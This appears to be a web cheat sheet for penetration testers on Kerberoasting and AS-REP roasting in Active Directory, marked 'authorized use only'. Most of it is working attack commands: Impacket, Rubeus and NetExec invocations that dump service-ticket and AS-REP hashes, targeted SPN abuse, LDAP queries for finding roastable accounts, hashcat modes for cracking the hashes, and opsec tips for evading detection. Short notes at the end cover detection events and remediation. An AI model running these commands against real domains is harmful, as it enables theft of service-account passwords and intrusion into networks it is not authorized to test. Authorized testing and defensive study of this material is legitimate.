← All cheat sheets

KERBEROASTING

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: Hash Identifier

OVERVIEW#

Kerberoasting requests service tickets (TGS) for accounts with an SPN
and cracks the RC4/AES-encrypted portion offline to recover the
service account password. AS-REP roasting targets accounts with
Kerberos pre-authentication disabled. Both are technique references,
distinct from the tooling sheets (RUBEUS/IMPACKET). Authorized use only.

KERBEROASTING - IMPACKET#

impacket-GetUserSPNs corp.lu/user:pass -dc-ip <dc>
                                     # List SPN accounts
impacket-GetUserSPNs corp.lu/user:pass -dc-ip <dc> -request
                                     # Request + dump hashes
impacket-GetUserSPNs corp.lu/user:pass -request -outputfile roast.txt
impacket-GetUserSPNs corp.lu/user:pass -request-user <svc>
                                     # Target one account
# Kerberos-only auth (no NTLM), useful when passwords unknown:
impacket-GetUserSPNs -k -no-pass corp.lu/user -dc-ip <dc> -request

KERBEROASTING - RUBEUS (WINDOWS)#

Rubeus.exe kerberoast                # Roast all SPN accounts
Rubeus.exe kerberoast /outfile:roast.txt
Rubeus.exe kerberoast /user:<svc>    # Single account
Rubeus.exe kerberoast /rc4opsec      # Only accounts crackable via RC4
Rubeus.exe kerberoast /tgtdeleg      # No creds needed (uses current)
Rubeus.exe kerberoast /nowrap        # Hash on one line

KERBEROASTING - NETEXEC#

nxc ldap <dc> -u user -p pass --kerberoasting roast.txt
nxc ldap <dc> -u user -H <hash> --kerberoasting roast.txt

AS-REP ROASTING - IMPACKET#

impacket-GetNPUsers corp.lu/ -usersfile users.txt -dc-ip <dc>
                                     # Test a user list (no creds)
impacket-GetNPUsers corp.lu/user:pass -request -format hashcat \
  -outputfile asrep.txt
# Accounts with DONT_REQ_PREAUTH flag are vulnerable

AS-REP ROASTING - RUBEUS / NXC#

Rubeus.exe asreproast /outfile:asrep.txt
Rubeus.exe asreproast /format:hashcat
nxc ldap <dc> -u user -p pass --asreproast asrep.txt

TARGETED / ABUSE VARIANTS#

# Targeted Kerberoast: if you can set an SPN on a victim you control,
# add one, roast it, then remove it (needs GenericWrite over victim):
targetedKerberoast.py -v -d corp.lu -u user -p pass
# AS-REP toggling: if GenericWrite, disable preauth then AS-REP roast

CRACKING (HASHCAT)#

# Kerberoast RC4 (etype 23):
hashcat -m 13100 roast.txt rockyou.txt -r rules/best64.rule
# Kerberoast AES256 (etype 18):
hashcat -m 19700 roast.txt rockyou.txt
# Kerberoast AES128 (etype 17):
hashcat -m 19600 roast.txt rockyou.txt
# AS-REP (etype 23):
hashcat -m 18200 asrep.txt rockyou.txt
# John equivalents: krb5tgs / krb5asrep formats

FIND TARGETS (LDAP)#

# SPN accounts (Kerberoastable):
ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName
# No-preauth accounts (AS-REP roastable):
ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"

EXAMPLES#

# Full Kerberoast with Kerberos auth and hashcat-ready output
impacket-GetUserSPNs -k -no-pass corp.lu/user -dc-ip 10.0.0.1 \
  -request -outputfile roast.txt
hashcat -m 13100 roast.txt rockyou.txt -r rules/best64.rule

# AS-REP hunt against a discovered user list, no credentials
impacket-GetNPUsers corp.lu/ -usersfile users.txt -dc-ip 10.0.0.1 \
  -format hashcat -outputfile asrep.txt

# RC4-only opsec roast (avoids requesting AES where enforced)
Rubeus.exe kerberoast /rc4opsec /nowrap /outfile:roast.txt

NOTES#

- Prefer AES targets only when needed; requesting RC4 for AES-capable
  accounts (etype downgrade) is a detection signal (Event 4769 rc4)
- Service accounts with weak, non-rotated passwords are the risk;
  gMSA/dMSA accounts are effectively uncrackable (120+ char random)
- AS-REP requires no valid credentials if you have a username list
- Detection: 4769 with 0x17 (RC4) at volume, from a single host;
  4768/4769 anomalies (see DETECTION-ENGINEERING.txt)
- Remediation for FS clients: long random managed service accounts,
  enforce AES, monitor SPN accounts - maps to DORA ICT hardening